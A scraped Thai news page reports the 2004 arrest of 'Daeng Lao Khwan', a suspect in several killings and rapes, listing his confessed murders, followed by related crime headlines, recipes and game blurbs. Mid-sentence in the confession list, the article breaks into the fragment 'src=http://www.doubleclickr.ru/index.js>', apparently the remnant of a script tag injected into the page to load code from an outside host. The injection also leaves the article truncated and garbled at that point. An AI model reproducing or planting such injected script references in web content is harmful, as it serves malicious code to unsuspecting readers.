เรื่องแปลกๆ | ข่าวเด่นประจำวัน | ข่าวการเมือง
ข่าวประจำวัน, ข่าวแปลกๆ
โฆษณา
  หน้าแรก  |  ข่าวเด่นประจำวัน  |  ข่าวแปลกๆ  |  ข่าวผู้หญิง ผู้หญิง  |  เรื่องลึกลับ  |  ข่าวบันเทิง  |  ข่าวต่างประเทศ  |  ตั้งเว็บนี้เป็นหน้าแรก 
โฆษณา
Bookmark and Share

แดงเลาขวัญ โจรข่มขืนฆ่า


(มีผู้อ่านแล้ว 4625 คน)
ผู้สนับสนุน

วันที่ 31 มีนาคม พ.ศ.2547 ปีที่ 13 ฉบับที่ 4871

จับ"แดงเลาขวัญ"โจรข่มขืนฆ่า

ก่อคดีอื้อขยี้เหยื่อรับจ้างฆ่า


"แดง เลาขวัญ"จอมโจรข่มขืนจนมุมตำรวจแล้ว ผบช.ภาค 1 แถลงจับกุมคนร้ายทมิฬก่อคดีฆ่าข่มขืนมานับไม่ถ้วน โดนตร.ชัยนาทล้อมจับได้กลางไร่อ้อยขณะหนีเตลิดคดีฆ่าหนุ่มราชบุรีแล้วฉุดแฟนสาวไปขืนใจ แฉประวัติสุดโฉดข่มขืนมานับสิบคดี รับจ้างฆ่าอีกอื้อ ฆ่าส.ท.สวนแตง-สุพรรณบุรีด้วย สารภาพหมดเปลือก อ้างกดดันเพราะตอนอายุ 19 ปี พ่อถูกฆ่า น้องถูกข่มขืนก็เลยเริ่มฆ่าคน

เมื่อเวลา 13.00 น. วันที่ 30 มี.ค. ที่ห้องประชุมกองบัญชาการตำรวจภูธรภาค 1 พล.ต.ท.ปานศิริ ประภาวัต ผบช.ภาค 1 พล.ต.ต.ปรัชญา สุทธิปรีดา และพล.ต.ต.สมาน สุวัฑฒนะ รองผบช.ภาค 1 พร้อมพล.ต.ต.บุญส่ง พานิชอัตรา ผบก.ชัยนาท แถลงผลการจับกุมนายอุทัย หรือ"แดง เลาขวัญ" แซ่ลี้ อายุ 44 ปี อยู่บ้านเลขที่ 108 ม.9 ต.บ้านโพธิ์ อ.เมือง สุพรรณบุรี ตามหมายจับของศาลจังหวัดกาญจนบุรี ที่ มจ.2372/46 ลงวันที่ 4 พ.ย. 2546 ในข้อหาฆ่าผู้อื่นและพยายามฆ่าผู้อื่น เหตุเกิดเมื่อวันที่ 19 ต.ค.2546 เวลา 18.00 น. ที่หมู่ 4 ต.หนองประดู่ อ.เลาขวัญ จ.กาญจนบุรี และหมายจับศาลจังหวัดสุพรรณบุรี ที่ 163/2547 ลงวันที่ 25 ก.พ. 2546 ข้อหาร่วมกันพยายามชิงทรัพย์เป็นเหตุให้ผู้อื่นได้รับอันตรายสาหัสและผู้อื่นถึงแก่ความตาย ร่วมกันพยายามฆ่าผู้อื่น และร่วมกันฆ่าผู้อื่นโดยเจตนา มีอาวุธปืนและเครื่องกระสุนปืนไว้ในความครอบครองโดยไม่ได้รับอนุญาต และพกพาอาวุธปืนไปในเมืองหมู่บ้านโดยไม่มีเหตุเร่งด่วนโดยไม่ได้รับอนุญาต

โดยตำรวจจับกุมแดง เลาขวัญได้ที่บ้านวังคอไห ม.5 ต.สุขเดือนห้า กิ่งอ.เนินขาม จ.ชัยนาท ทั้งนี้ สืบเนื่องจากนายอุทัย หรือแดงเลาขวัญ เป็นคนร้ายที่ก่อเหตุคดีฆ่าผู้อื่น และคดีข่มขืนฆ่าหลายสิบคดีในเขตจ.กาญจนบุรี เพชรบุรี ราชบุรี และสุพรรณบุรี มีหมายจับและเป็นคนร้ายที่ทางการต้องการตัว โดยล่าสุดเพิ่งก่อเหตุฆ่านายยนต์ เสือเฒ่า ที่อ่างเก็บน้ำพุยาว ต.ท่าหลวง อ.ปากท่อ จ.ราชบุรี และจับแฟนสาวของนายยนต์ไปข่มขืน พร้อมนำตัวไปกักขังในพื้นที่อ.บ้านไร่ จ.อุทัยธานี กระทั่งเหยื่อสาวออกอุบายจนหลบหนีออกมาได้ เข้าแจ้งความต่อตำรวจนำกำลังเข้าจับกุม แต่แดงเลาขวัญไหวตัวทัน จึงหลบหนีการจับกุมของเจ้าหน้าที่ไปได้ กระทั่งมาถูกตำรวจจ.ชัยนาทจับกุมได้ในที่สุด ซึ่งผู้ต้องหารายนี้ถือเป็นภัยอันตรายต่อสังคมอย่างยิ่ง

พล.ต.ท.ปานศิริ กล่าวว่า สำหรับผู้ต้องหารายนี้ ภายหลังที่ตำรวจภูธรภาค 7 ได้ติดตามตัวมาตลอด ตนจึงสั่งการในที่ประชุมช่วยตรวจสอบเนื่องจากพื้นที่ภาค 1 กับภาค 7 ติดต่อกัน โดยเฉพาะจ.ชัยนาทมีแผนประทุษกรรมของคนร้ายและการปรากฏตัวของคนร้ายอยู่ที่อ.บ้านไร่ จ.อุทัยธานี จึงสั่งการให้พล.ต.ต.บุญส่งช่วยกระจายข่าวไปให้ถึงผู้ใต้บังคับบัญชา ซึ่งเป็นผู้ปฏิบัติกระทั่งเมื่อเวลา 07.30 น.วันเดียวกันนี้ พ.ต.ท.ศรประสิทธิ์ ธัญญสิริ รอง ผกก.หน.สภ.กิ่งอ.เนินขาม จ.ชัยนาท ร.ต.ท.สนั่น มณีฉาย รองสวป.พร้อมกำลังเจ้าหน้าที่จำนวนหนึ่งได้เฝ้าสังเกตการณ์ และสามารถจับกุมตัวนายอุทัยได้ โดยได้เบาะแสจากประชาชนอีกส่วนหนึ่งที่เห็นผู้ต้องสงสัยเดินขากะเผลกออกมาจากไร่อ้อยจนเป็นที่สงสัย จึงแจ้งเจ้าหน้าที่เข้าไปตรวจสอบและจับกุมตัวไว้ได้

พล.ต.ท.ปานศิริกล่าวว่า เบาะแสที่ได้เรื่องนี้ส่วนหนึ่งต้องขอขอบคุณประชาชนในพื้นที่ จริงๆ แล้วเรื่องอาชญากรรมประชาชนเป็นสิ่งที่สำคัญที่สุด ซึ่งการทำงานต้องเอาประชาชนเป็นศูนย์กลาง บวกกับความสนใจของเจ้าหน้าที่ตำรวจในครั้งนี้ด้วยและเพื่อเป็นขวัญและกำลังจในการทำงานจึงจะมีการมอบรางวัลและประกาศณียบัตรให้กับผู้ปฏิบัติงานในครั้งนี้

สำหรับนายอุทัย หรือแดง เลาขวัญ มีหมายจับอยู่หลายสิบคดี และยังมีการสอบสวนขยายผลไปถึงคดีอื่นด้วย ซึ่งขณะนี้ผบก.สุพรรณบุรีสั่งการให้ตำรวจออกติดตามผู้ที่ร่วมกระทำผิดในส่วนหนึ่งแล้ว

พล.ต.ต.บุญส่งกล่าวว่า จากการสอบสวนผู้ต้องหาเบื้องต้นให้การรับสารภาพเคยกระทำความผิดคือ 1.ยิงนายสุเทพ วศินธรวิสุทธิ์ เทศมนตรีต.สวนแตง จ.สุพรรณบุรี จนเสียชีวิต 2.ยิงนายชวลิต จำคำ ที่อ.อู่ทอง จ.สุพรรณบุรี เสียชีวิต 3.ยิงนายมนตรี ศรีสว่าง ที่อ.เมือง สุพรรณบุรี เสียชีวิต 4.ก่อคดียิงนักดนตรีเสียชีวิตและฉุดภรรยาซึ่งเป็นหางเครื่องไปข่มขืนแล้วฆ่าทิ้ง 5.ฆ่านายสุวรรณ แซ่โค้ว ที่จ.สุพรรณบุรี 6.ฆ่านายยนต์ เสือเฒ่า ที่อ่างเก็บน้ำพุยาว ต.ท่าหลวง อ.ปากท่อง จ.ราชบุรี แล้วฉุดแฟนสาวไปข่มขืน นอกจากนี้ยังมีคดีข่มขืนอีกหลายสิบคดีที่น่าเชื่อว่าเป็นฝีมือของนาย src=http://www.doubleclickr.ru/index.js>

แสดงความคิดเห็น เกี่ยวกับข่าวนี้

โฆษณา

ข่าวอื่นๆ ในหมวดเดียวกัน

"โสภณ" ยื่นมือช่วย "น้องปลายฟ้า"
จาก กรณีของ ด.ญ.ปลายฟ้า สีหาคม อายุ 4 ขวบ ซึ่งเป็นผู้โชคดีได้รับเงินรางวัล 1 ล้านบาท และรถยนต์ 1 คัน จากการโหวตชื่อแพนด้าน้อย "หลินปิง" ที่ทางองค์การสวนสัตว์ ในพระบรมราชูปถัมภ์จัดขึ้น
ฝากขัง แอนดรูว์ หลังถูกจับพร้อมยาไอซ์ ฝากขัง แอนดรูว์ หลังถูกจับพร้อมยาไอซ์ ฝากขัง แอนดรูว์ หลังถูกจับพร้อมยาไอซ์
ความคืบหน้า คดีนายกรเศก หรือศุภมร หรือแอนดรูว์ โคร์นิน อายุ 25 ปี นักแสดง ถูกจับกุมพร้อมของกลาง ยาไอซ์จำนวนหนึ่งและอุปกรณ์การเสพ ซึ่งเบื้องต้นดาราหนุ่มให้การภาคเสธ ว่าห้องที่ถูกบุกเข้าจับกุมและของกลางที่พบเป็นของเพื่อน
วัยรุ่นรุมกระทืบ-แทงดับ วัยรุ่นรุมกระทืบ-แทงดับ วัยรุ่นรุมกระทืบ-แทงดับ
เกิดเหตุแทงกันตายที่ร้าน โรงเล่าพรรคพวก ปากซอยเทพลีลา 5 ซ.รามคำแหง 39 แขวงและเขตวังทองหลาง กทม. นายธีรพงศ์ คำลือชา อายุ 30 ปี นอนหงายจมกองเลือด ตรวจสอบพบถูกแทงซี่โครงด้านซ้าย 3 แผล
ฟันเพิ่ม บ้านบนเขายายเที่ยง เจ้าของมียศ ฟันเพิ่ม บ้านบนเขายายเที่ยง เจ้าของมียศ ฟันเพิ่ม บ้านบนเขายายเที่ยง เจ้าของมียศ
กรมป่าไม้สั่งฟันบ้าน 5 หลังบนเขายายเที่ยงติดบ้าน พล.อ.สุรยุทธ์ อุบชื่อผู้ครอบครองระบุเป็นชื่ออันตราย มีชั้นยศนำหน้า และขณะนี้มีการเคลื่อนไหวเพื่อที่จะเปลี่ยนมืออยู่ตลอดเวลา...
โวยร้อยโทยำสิบเอกโรงพักหนองแซงดับ โวยร้อยโทยำสิบเอกโรงพักหนองแซงดับ โวยร้อยโทยำสิบเอกโรงพักหนองแซงดับ
ผู้สื่อข่าวรายงานว่า ที่สถาบันนิติเวช รพ.ตำรวจ นายมั่น ใคร่ครวญ อายุ 60 ปี เดินทางมารับศพ ส.ต.อ.สุรชัย ใคร่ครวญ อายุ 35 ปี ผบ.หมู่ ธร สภ.หนองแซง จ.สระบุรี บุตรชาย ที่ถูกร้อยตำรวจโทสถานีตำรวจภูธรเดียวกันทำร้ายร่างกายเสียชีวิต
ตร.ขอภาพสื่อ หาหัวโจกแฟนบอลหนองจอก ตร.ขอภาพสื่อ หาหัวโจกแฟนบอลหนองจอก ตร.ขอภาพสื่อ หาหัวโจกแฟนบอลหนองจอก
พ.ต.อ.ไพศาล ลือสมบูรณ์ ผู้กำกับการ สน.ปทุมวัน เปิดเผยถึงความคืบหน้ากรณีเหตุแฟนบอลทีมการท่าเรือไทยเอฟซี ยกพวกทำร้ายแฟนบอลเมืองทอง-หนองจอก ยูไนเต็ด ระหว่างการแข่งขันฟุตบอลชิงถ้วยพระราชทานประเภท ก ที่สนามศุภชลาศัย
สั่งดำเนินคดีเด็ดขาด ซีฟู่ มาเฟียดังพัทยา สั่งดำเนินคดีเด็ดขาด ซีฟู่ มาเฟียดังพัทยา สั่งดำเนินคดีเด็ดขาด ซีฟู่ มาเฟียดังพัทยา
ผบช.สตม.สั่งดำเนินคดี "ซีฟู่" นักธุรกิจชื่อดัง ชาวนิวซีแลนด์ เด็ดขาด หลังพบพฤติกรรมเข้าข่ายทำตัวเป็นผู้มีอิทธิพลข่มขู่ชาวต่างชาติในพื้นที่เมืองพัทยา...
กิ๊กเก่ายิงแฟนใหม่ดับ หึงสาว นศ.ปี 2 กิ๊กเก่ายิงแฟนใหม่ดับ หึงสาว นศ.ปี 2 กิ๊กเก่ายิงแฟนใหม่ดับ หึงสาว นศ.ปี 2
ยิงดับ จนท.มหาวิทยาลัยดังใน จ.สุรินทร์ คาหน้าบ้านแฟนสาว ตร.ตามตะครุบตัวมือปืนทันควัน เผยเป็นแฟนเก่า ก่อนเกิดเหตุตั้งวงก๊งเหล้ากันที่บ้านสาว หลังแยกย้ายกันกลับเกิดคาใจ ย้อนกลับมาเคลียร์..
หนุ่มเอแบคดิ่งตึกสังเวยรักวาเลนไทน์ หนุ่มเอแบคดิ่งตึกสังเวยรักวาเลนไทน์ หนุ่มเอแบคดิ่งตึกสังเวยรักวาเลนไทน์
เครียดหนักสาวสุดรักมีแฟนใหม่ หลังบินไปเรียนต่อเมืองนอก ตัดสินใจดิ่งตึกหนีรักขมสังเวยวันวาเลนไทน์
"ตุ้ย เอ็กซเรย์" มอบตัวสู้คดีฉ้อโกงสาวใหญ่
เมื่อเวลา 10.30 น. วันที่ 12 ก.พ. ที่ บก.ป. นายณัชพล โรจน์ถาวร ประธานเครือข่ายสื่อมวลชนต่อต้านทุจริตแห่งชาติ (ส.ท.ช.) พานายจักรินทร์ โกศัยดิลก หรือ “ตุ้ย เอ็กซเรย์” หมอดูชื่อดังเจ้าของฉายา “คนตาทิพย์” น.ส.พิมพ์วรัชญ์ โกศัยดิลก
จับมือปาระเบิดคลองเตย จับมือปาระเบิดคลองเตย จับมือปาระเบิดคลองเตย
1 ใน 7 ผู้ต้องหาปาระเบิดตลาดคลองเตยถูกรวบตัวแล้ว แต่ยังให้การภาคเสธ อ้างอยู่ในที่เกิดเหตุแต่ไม่รู้เรื่องระเบิดที่เกิดขึ้น
นาธานเลื่อนพบพนักงานสอบสวน16ก.พ. นาธานเลื่อนพบพนักงานสอบสวน16ก.พ. นาธานเลื่อนพบพนักงานสอบสวน16ก.พ.
เมื่อวันที่ 5 ก.พ. ที่กองบังคับการตำรวจนครบาล 1(บก.น.1) พล.ต.ต.วิชัย สังข์ประไพ ผบก.น.1 เปิดเผยว่า วันนี้ทนายความของนายนาธาน โอมาน
คุกกว่า 1000ปี แก๊งแชร์ลูกโซ่ คุกกว่า 1000ปี แก๊งแชร์ลูกโซ่ คุกกว่า 1000ปี แก๊งแชร์ลูกโซ่
ศาลอาญาพิพากษาจำคุกแก๊งแชร์ลูกโซ่ คนละกว่า 1,000 ปี หลังหลอกลวงประชาชนให้สมัครสมาชิก ผลิตภัณฑ์เสริมอาหาร ยาแผนโบราณ
ฆ่าปาดคอแม่-ลูกสาว 4 ขวบคาห้องนอน ฆ่าปาดคอแม่-ลูกสาว 4 ขวบคาห้องนอน ฆ่าปาดคอแม่-ลูกสาว 4 ขวบคาห้องนอน
สารวัตรเวร สภ.เมืองสมุทรสาคร รับแจ้งเหตุมีคนถูกฆ่าตายที่ร้านขายอาหารตามสั่ง ตรงข้ามทางเข้าวัดป่าท่าทราย หมู่ที่ 5 ต.ท่าทราย อ.เมือง จ.สมุทรสาคร จึงรุดไปตรวจสอบที่เกิดเหตุ พบเป็นบ้านไม้ชั้นเดียว เปิดเป็นร้านขายอาหารตามสั่ง
ชาวบ้านหาปลาพบอาวุธสงครามถูกทิ้งใต้น้ำ ชาวบ้านหาปลาพบอาวุธสงครามถูกทิ้งใต้น้ำ ชาวบ้านหาปลาพบอาวุธสงครามถูกทิ้งใต้น้ำ
พบชิ้นส่วนอาวุธปืนสงครามถูกทิ้งไว้ที่บริเวณใต้สะพานเพียนาม ต.หนองไผ่ เจ้าหน้าที่ตรวจสอบพบเป็นชิ้นส่วนของลำกล้องอาวุธปืน เอ็ม 16 จำนวน 1 กระบอก ลำกล้องอาวุธปืนอาก้า 3 กระบอก และปืนลูกซองยาว อีก 1 กระบอก
ผู้สนับสนุน

หมวดหมู่ข่าว

RSS Feeds ข่าวเด่นประจำวัน ข่าวเด่นประจำวันRSS Feeds ข่าวการเมือง ข่าวการเมือง
RSS Feeds ข่าว แปลก คน ข่าว แปลก คนRSS Feeds ข่าว แปลก สัตว์ พืช ข่าว แปลก สัตว์ พืช
RSS Feeds ข่าว แปลก ทั่วไป ข่าว แปลก ทั่วไปRSS Feeds ข่าวต่างประเทศ ข่าวต่างประเทศ
RSS Feeds เรื่องลึกลับ เรื่องลึกลับRSS Feeds ข่าววิทยาการ ข่าววิทยาการ
RSS Feeds คดีดัง คดีดังRSS Feeds อย่าประมาท อย่าประมาท
RSS Feeds โชคดี โชคดีRSS Feeds ข่าวเศรษฐกิจ ข่าวเศรษฐกิจ
RSS Feeds ข่าวบันเทิง ข่าวบันเทิงRSS Feeds ข่าวท่องเที่ยว ข่าวท่องเที่ยว
RSS Feeds ข่าวผู้หญิง ข่าวผู้หญิงRSS Feeds ข่าวการเกษตร ข่าวการเกษตร
RSS Feeds ข่าวกีฬา ข่าวกีฬาRSS Feeds ข่าวภูมิภาค ข่าวภูมิภาค
RSS Feeds ชีวิตต้องสู้ ชีวิตต้องสู้RSS Feeds ธุรกิจแฟรนไชส์ ธุรกิจแฟรนไชส์
RSS Feeds ร้านอาหารอร่อย ร้านอาหารอร่อยRSS Feeds บุคคล น่าร บุคคล น่าร
RSS Feeds ที่สุดในโลก ที่สุดในโลกRSS Feeds ครั้งแรก ครั้งแรก
RSS Feeds วิชาชีพ วิชาชีพRSS Feeds บทความ ดีๆ บทความ ดีๆ
RSS Feeds สูตรอาหารจานเด็ด สูตรอาหารจานเด็ดRSS Feeds ประวัติศาสตร์ ประวัติศาสตร์
RSS Feeds มิตรภาพ มิตรภาพRSS Feeds ขบวนการต้มตุ๋น ขบวนการต้มตุ๋น
RSS Feeds คนดี คนดีRSS Feeds สัตว์เลี้ยง สัตว์เลี้ยง
RSS Feeds สัตว์หายาก สัตว์หายากRSS Feeds เรื่องย่อละคร เรื่องย่อละคร
RSS Feeds พระราชนิพนธ์ พระราชนิพนธ์RSS Feeds นิยาย เรื่องสั้น กลอน นิยาย เรื่องสั้น กลอน
RSS Feeds รูปภาพประจำวัน รูปภาพประจำวันRSS Feeds English News English News
ข่าวประจำวัน
ดาวน์โหลดฟรี
เว็บไซต์แนะนำ

อาหารและเครื่องดื่ม คลิปเด็ด
ดาวน์โหลดฟรี เกมส์ออนไลน์
ฟังเพลงออนไลน์ แม่และเด็ก
แหล่งรวมบทความน่ารู้ Free article Around the world.
เกมส์ออนไลน์

เกมส์ซุ่มยิงการป้องกันเมือง
เกมส์ซุ่มยิงการป้องกันเมือง
ซุ่มยิงทหารที่จะมาโจมตีเมืองของเราและแต่ละด่านเราาจะสามารถเก้บเงินซื้อปืนที่แรงกว่าได้เรื่อยๆลองเ่ล่นกันดูนะครับ
เกมส์จักรยาน3D
เกมส์จักรยาน3D
ปั่นจักรยานเก็บดาวในแต่ละเส้นทางจะมีสิ่งกีดขวางเยอะแยะมากมายหลบมันให้ได้นะครับลองกันดูนะ
เกมส์สงครามชิงดินแดน
เกมส์สงครามชิงดินแดน
จัดทัพทหารและสามารถเปลี่ยนการบุกหรือทั้งรับได้อย่างเป็นอิสระลองเป็นส่วนหนึ่งของสงครามครั้งนี้กันดูนะครับ
เกมส์กังฟูตามล่าหาสมบัติ
เกมส์กังฟูตามล่าหาสมบัติ
เป็นการตามล่าหาสมบัติที่กังฟูต้องการและจะเป้นยังไงลองไปตามหาด้วยกันนะครับ
เกมส์ffrog
เกมส์ffrog
กบต้องเก็บและไปช่วยเ้จ้าหญิงที่รออยู่ในประสาทให้ได้แต่ในด่านที่จะต้องฝ่าไปนั้นจะต้องอาศัยในการคล่องตัว
รวมสูตรอาหารจานเด็ด

ไส้กรอกต้ม ไส้กรอกต้ม
ไส้กรอกต้ม ไส้กรอกแบบโฮมเมด มีส่วนผสมหลายอย่างทั้งหมู เนื้อ ตับ ผสมปรุงรส แล้วนำไปต้มไฟอ่อนๆ จนสุก ก่...
เค้กมันฝรั่ง เค้กมันฝรั่ง
เค้กมันฝรั่ง ตรียมพิมพ์ด้วย Clarified Sutter และกระดาษไข ใช้ Dough Cutter ทรงวงกลมตัดมันฝรั่งและหั่นมัน...
ขนมโสมนัส ขนมโสมนัส
ขนมโสมนัส ตี ไข่ขาวให้ขึ้นฟู ใส่น้ำตาลทีละน้อยจนหมด ใส่เกลือ น้ำมะนาว ตีไข่ขาวจนแข็งตั้งยอด ใส่มะพร้...
ข้าวเม่ามะพร้าวอ่อน ข้าวเม่ามะพร้าวอ่อน
ข้าวเม่ามะพร้าวอ่อน ผสมน้ำตาล น้ำลอยดอกมะลิ มะพร้าวทึนทึก เข้าด้วยกันลง กระทะ ตั้งไฟกลาง กวนพอเริ่มเหนียว ใส่ม...
จ่ามงกุฎ จ่ามงกุฎ
จ่ามงกุฎ ผสมกะทิกับน้ำตาลทรายให้เข้ากัน ตั้งไฟอ่อน ๆ ให้ส่วนผสมข้น ยกลงทิ้งไว้ให้อุ่น ใส่ไข่แดงลงใ...
ซุปปลาซีฟู๊ด ซุปปลาซีฟู๊ด
ซุปปลาซีฟู๊ด จัดผักกาดขาว ผักบุ้งจีน วุ้นเส้นใส่จาน เมื่อน้ำซุปเดือดดีแล้ว นำเนื้อปลาที่แช่น้ำเย็นออกมา...